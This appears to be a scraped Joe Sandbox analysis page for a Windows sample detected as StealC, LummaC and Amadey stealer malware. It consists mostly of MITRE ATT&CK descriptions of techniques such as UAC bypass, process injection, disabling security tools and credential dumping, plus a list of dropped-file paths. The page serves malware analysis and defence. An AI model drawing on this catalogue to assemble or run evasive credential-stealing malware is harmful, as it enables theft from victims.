Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lIocM276SA.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4477947f1f.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\pohtent2[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

Windows Analysis Report
lIocM276SA.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre